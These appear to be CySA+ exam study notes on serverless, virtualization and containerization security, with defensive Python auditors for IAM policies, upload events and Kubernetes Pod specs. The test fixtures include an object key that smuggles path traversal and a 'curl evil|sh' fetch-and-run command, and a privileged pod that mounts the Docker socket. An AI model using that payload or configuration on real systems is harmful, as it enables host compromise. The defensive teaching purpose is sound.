Serverless, virtualization, containerization

1.1 System and Network Architecture Concepts

Infrastructure

📘CompTIA CySA+ (CS0-003)


Modern IT infrastructure uses several technologies to deliver applications efficiently, securely, and cost-effectively. Three important concepts you must understand for the CySA+ exam are:

  1. Serverless computing
  2. Virtualization
  3. Containerization

These are foundational in cloud and enterprise environments, and security analysts must understand how they work, where they are used, and what risks they introduce.


1. Serverless Computing

What Serverless Means

Serverless computing is a cloud execution model where the cloud provider runs and manages everything behind the scenes—servers, operating systems, scaling, updates, and capacity planning.
Developers only upload their code, and the cloud automatically runs it.

You do not manage:

  • Servers
  • Operating systems
  • Patching
  • Resource scaling

The cloud runs the code on-demand, usually in small units called functions.

Key Characteristics

  • No server management: The cloud provider handles all infrastructure.
  • Event-driven: Functions run only when triggered (e.g., file upload, API request).
  • Scales automatically: More traffic = more function executions.
  • Pay per execution: You pay only when your code runs.
  • Short-lived execution: Functions run for short periods, not continuously.

Common Serverless Use Cases (IT Environment Examples)

  • Running an authentication API endpoint
  • Processing logs or security alerts
  • Automatically resizing uploaded images
  • Cleaning or transforming incoming data

Security Considerations (Important for CySA+)

Because the customer does not control the underlying systems, security responsibilities shift.

Security Responsibilities of the User:

  • Secure the application code
  • Properly configure access controls (IAM permissions)
  • Validate input to prevent injection attacks
  • Protect API endpoints

Security Responsibilities of the Cloud Provider:

  • Server patching
  • Operating system hardening
  • Infrastructure monitoring
  • Physical security

Serverless Security Risks

  • Misconfigured permissions (excessive privileges for functions)
  • Insecure APIs
  • Event-data injection attacks
  • Lack of visibility into infrastructure logs
  • Dependency vulnerabilities in the function code
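The two risks an analyst can check directly are the first and third in the list above: a function role that grants wildcard permissions, and a handler that trusts the fields of the event that triggered it. The following added example (written for these notes, not code from any cloud provider or from the CySA+ material) audits an AWS-style JSON policy document for wildcard actions and resources, and shows a Lambda-style handler that validates an "object created" event before using its fields. The policy documents, the events, the bucket name and the handler signature are constructed assumptions for illustration.

```python
import re

# Constructed AWS-style policy attached to a function role: s3:* on every
# resource is the classic "excessive privileges for functions" finding.
OVERLY_BROAD_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
        {"Effect": "Allow", "Action": "logs:CreateLogStream", "Resource": "*"},
    ],
}

# Constructed least-privilege version: one read action on one bucket prefix,
# logging scoped to the function's own log group.
LEAST_PRIVILEGE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::example-uploads/*"},
        {"Effect": "Allow", "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
         "Resource": "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/resize:*"},
    ],
}


def audit_policy(policy):
    """Return findings for Allow statements with wildcard actions or
    resources; an empty list means no excessive privilege was found."""
    findings = []
    for i, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        resources = stmt.get("Resource", [])
        actions = [actions] if isinstance(actions, str) else actions
        resources = [resources] if isinstance(resources, str) else resources
        for a in actions:
            if a == "*" or a.endswith(":*"):
                findings.append(f"statement {i}: wildcard action {a!r}")
        for r in resources:
            if r == "*":
                findings.append(f"statement {i}: wildcard resource '*'")
    return findings


# Object keys are allowed only as a single safe filename: no "/" means the key
# can never traverse directories if it is later used to build a local path.
SAFE_KEY = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$")
ALLOWED_BUCKETS = {"example-uploads"}   # assumption: the only bucket we serve


def validate_upload_event(event):
    """Parse and validate a constructed 'object created' event.
    Returns (bucket, key) or raises ValueError; the event is untrusted input."""
    try:
        rec = event["Records"][0]
        bucket = rec["s3"]["bucket"]["name"]
        key = rec["s3"]["object"]["key"]
        size = int(rec["s3"]["object"]["size"])
    except (KeyError, IndexError, TypeError, ValueError):
        raise ValueError("malformed event")
    if bucket not in ALLOWED_BUCKETS:
        raise ValueError(f"unexpected bucket {bucket!r}")
    if not SAFE_KEY.match(key):
        raise ValueError(f"rejected object key {key!r}")
    if not 0 < size <= 10 * 1024 * 1024:
        raise ValueError("object size out of bounds")
    return bucket, key


def handler(event, context=None):
    """Function entry point (Lambda-style (event, context) signature assumed)."""
    try:
        bucket, key = validate_upload_event(event)
    except ValueError as exc:
        # Reject and report; never pass unvalidated event data to a shell,
        # a database query or a filesystem path.
        return {"status": "rejected", "reason": str(exc)}
    local_path = "/tmp/" + key      # safe: key contains no path separators
    return {"status": "ok", "bucket": bucket, "key": key, "local_path": local_path}


# Constructed events: one benign, one carrying traversal and shell metacharacters.
GOOD_EVENT = {"Records": [{"s3": {"bucket": {"name": "example-uploads"},
                                  "object": {"key": "photo-2024.jpg", "size": 204800}}}]}
BAD_EVENT = {"Records": [{"s3": {"bucket": {"name": "example-uploads"},
                                 "object": {"key": "../../etc/cron.d/x;curl evil|sh",
                                            "size": 10}}}]}

if __name__ == "__main__":
    print(audit_policy(OVERLY_BROAD_POLICY))
    print(audit_policy(LEAST_PRIVILEGE_POLICY))
    print(handler(GOOD_EVENT))
    print(handler(BAD_EVENT))
```

The second statement of the broad policy (CloudWatch-style logging on every resource) is also flagged; that is deliberate, since a wildcard resource deserves a review even when the action is low-risk. The handler follows the allowlist pattern: it decides what a valid key looks like rather than trying to enumerate dangerous characters.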

2. Virtualization

What Virtualization Is

Virtualization allows multiple virtual machines (VMs) to run on a single physical server.
A hypervisor manages these VMs.

Each VM has:

  • its own operating system
  • its own virtual CPU
  • virtual memory
  • virtual storage
  • virtual network interfaces

Types of Virtualization

  1. Server Virtualization
    • Runs multiple VMs on one server for better resource use.
  2. Network Virtualization
    • Virtual switches, routers, and firewalls.
  3. Storage Virtualization
    • Combines physical disks into a shared storage pool.
  4. Desktop Virtualization (VDI)
    • Users access virtual desktops over a network.

Hypervisor Types

Type 1: Bare-metal hypervisors

  • Installed directly on physical hardware.
  • Used in data centers (e.g., VMware ESXi, Microsoft Hyper-V, KVM).
  • Smaller attack surface (no general-purpose host OS underneath the hypervisor) and more efficient.

Type 2: Hosted hypervisors

  • Installed inside an OS (e.g., VirtualBox, VMware Workstation).
  • Used for testing or learning.

Security Benefits of Virtualization

  • Isolation between VMs
  • Snapshots allow easy rollback after malware infection
  • Virtual firewalls and intrusion prevention
  • Segmentation between applications and environments

Security Risks

  • Hypervisor attacks: If the hypervisor is exploited, all VMs may be compromised.
  • VM escape: Malware breaks out of a VM into the hypervisor.
  • Misconfigured virtual networks: May allow unwanted traffic flow.
  • Orphaned or stale snapshots: Reverting to an old snapshot reintroduces unpatched software and removed accounts, and forgotten snapshots keep old data on storage.
  • VM sprawl: Too many unused VMs increase attack surface.

3. Containerization

What Containerization Is

Containerization packages an application and its dependencies into a lightweight, isolated unit called a container.

Containers:

  • Share the host OS kernel
  • Have isolated processes
  • Start very quickly
  • Require fewer resources than VMs

A container is not a full virtual machine—it’s a compact application environment.

Common Container Platforms

  • Docker
  • CRI-O
  • containerd
  • Kubernetes (orchestrates multiple containers)

Differences Between Containers and VMs

Feature        | Virtual Machines (VMs)       | Containers
---------------|------------------------------|----------------------------------
OS             | Each VM has its own full OS  | Share the host OS kernel
Size           | Large (GBs)                  | Very small (MBs)
Startup time   | Slow (minutes)               | Fast (seconds)
Isolation      | Strong (via hypervisor)      | Moderate (via namespaces/cgroups)
Use case       | Large workloads, full OS     | Microservices, scalable apps

Container Components

  • Images: Templates used to create containers.
  • Container runtime: Engine that runs containers (e.g., Docker Engine).
  • Registry: Stores container images (e.g., Docker Hub).

Where Containers Are Used in IT

  • Running microservices
  • Hosting APIs
  • Deploying applications across different environments
  • Automating CI/CD pipelines

Security Considerations

Because containers share the host kernel, a kernel vulnerability, or a misconfiguration such as a privileged container or a mounted host path, can let an attacker escape to the host or move between containers.

Common Security Risks

  • Insecure container images
  • Misconfigured container permissions
  • Overly privileged containers (running as root)
  • Vulnerable container runtimes
  • Exposed administrative dashboards (e.g., Kubernetes)

Best Security Practices

  • Use trusted images
  • Scan container images for vulnerabilities
  • Apply least privilege
  • Limit container-to-container communication
  • Use Kubernetes network policies
  • Keep the host OS patched
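Most of the risks and practices in the two lists above are visible in a workload's manifest before it ever runs. The following added example (written for these notes, not a Kubernetes or Docker project tool) audits a Pod spec for the privilege and image problems listed, and checks whether a namespace has a default-deny ingress NetworkPolicy, which is the usual first step in limiting container-to-container communication. The specs are constructed as Python dicts so the example runs without a YAML library; the field names follow the Kubernetes API, while the registry name, image digest and namespace are assumptions.

```python
# Constructed risky Pod: a debug shell that is privileged, shares host
# namespaces, mounts the container runtime socket and pulls a floating tag.
RISKY_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "debug-shell"},
    "spec": {
        "hostPID": True,
        "hostNetwork": True,
        "containers": [{
            "name": "shell",
            "image": "ubuntu:latest",
            "securityContext": {"privileged": True},
            "volumeMounts": [{"name": "dock", "mountPath": "/var/run/docker.sock"}],
        }],
        "volumes": [{"name": "dock", "hostPath": {"path": "/var/run/docker.sock"}}],
    },
}

# Constructed hardened Pod: non-root, no privilege escalation, read-only root
# filesystem, all capabilities dropped, image pinned by digest from an
# internal registry (registry name and digest are placeholders).
HARDENED_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "api"},
    "spec": {
        "containers": [{
            "name": "api",
            "image": "registry.example.internal/team/api@sha256:" + "a" * 64,
            "securityContext": {
                "runAsNonRoot": True, "runAsUser": 10001,
                "allowPrivilegeEscalation": False,
                "readOnlyRootFilesystem": True,
                "capabilities": {"drop": ["ALL"]},
            },
        }],
    },
}

TRUSTED_REGISTRIES = ("registry.example.internal/",)   # assumption


def audit_pod(pod):
    """Return a list of findings; an empty list means the spec passed."""
    findings = []
    spec = pod["spec"]
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.append(f"pod shares host {flag[4:].lower()} namespace")
    for vol in spec.get("volumes", []):
        if "hostPath" in vol:
            findings.append(f"hostPath volume {vol['hostPath']['path']}")
    for c in spec["containers"]:
        name, img = c["name"], c["image"]
        sc = c.get("securityContext", {})
        if not img.startswith(TRUSTED_REGISTRIES):
            findings.append(f"{name}: image {img} not from a trusted registry")
        if "@sha256:" not in img:
            findings.append(f"{name}: image not pinned by digest")
        if sc.get("privileged"):
            findings.append(f"{name}: privileged container")
        if not sc.get("runAsNonRoot") and sc.get("runAsUser", 0) == 0:
            findings.append(f"{name}: may run as root")
        if sc.get("allowPrivilegeEscalation", True):
            findings.append(f"{name}: allowPrivilegeEscalation not disabled")
        if "ALL" not in sc.get("capabilities", {}).get("drop", []):
            findings.append(f"{name}: does not drop all capabilities")
    return findings


# Constructed namespace-wide default-deny ingress policy.
DEFAULT_DENY = {"apiVersion": "networking.k8s.io/v1", "kind": "NetworkPolicy",
                "metadata": {"name": "default-deny-ingress", "namespace": "prod"},
                "spec": {"podSelector": {}, "policyTypes": ["Ingress"]}}


def has_default_deny_ingress(policies):
    """True if some policy selects every pod (empty podSelector), declares
    Ingress and lists no ingress rules, i.e. all inbound traffic is denied
    until a more specific policy allows it."""
    for p in policies:
        spec = p.get("spec", {})
        if (spec.get("podSelector") == {} and "Ingress" in spec.get("policyTypes", [])
                and not spec.get("ingress")):
            return True
    return False


if __name__ == "__main__":
    for pod in (RISKY_POD, HARDENED_POD):
        print(pod["metadata"]["name"], audit_pod(pod))
    print("default deny in prod:", has_default_deny_ingress([DEFAULT_DENY]))
```

In a pipeline this kind of check runs before deployment, and the same rules can be enforced at admission time so that a manifest which fails them is rejected by the cluster rather than merely reported.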

Comparison Summary

Serverless vs. Virtualization vs. Containerization

Feature                   | Serverless                 | Virtualization            | Containerization
--------------------------|----------------------------|---------------------------|------------------------------------
Infrastructure management | None by user               | User manages VMs          | User manages containers
Runs on                   | Cloud-managed platform     | Hypervisor                | Container engine
Execution                 | Functions on-demand        | Full OS instances         | Lightweight processes
Security focus            | Permissions, code security | Hypervisor/VM isolation   | Image/runtimes, kernel security
Scaling                   | Automatic                  | Manual or semi-automatic  | Automatic with orchestration tools

What CySA+ Wants You to Understand

For the exam, you must clearly know:

Serverless

  • How it works
  • Why it is used
  • Security responsibilities and risks
  • Event-driven architecture

Virtualization

  • Hypervisor types
  • VM isolation and risks (VM escape, misconfiguration)
  • Resource sharing
  • Threats related to snapshots and sprawl

Containerization

  • Containers vs. VMs
  • Images, registries, runtimes
  • Security best practices
  • Kubernetes risks and network controls

Conclusion

Serverless, virtualization, and containerization are fundamental technologies in modern IT infrastructures.
Cybersecurity analysts must understand how they work, their architecture, and the security implications associated with each. On the CySA+ exam, expect questions focused on:

  • Differences between each technology
  • Shared responsibility models
  • Security risks, misconfigurations, and isolation issues
  • How these technologies support modern cloud and enterprise environments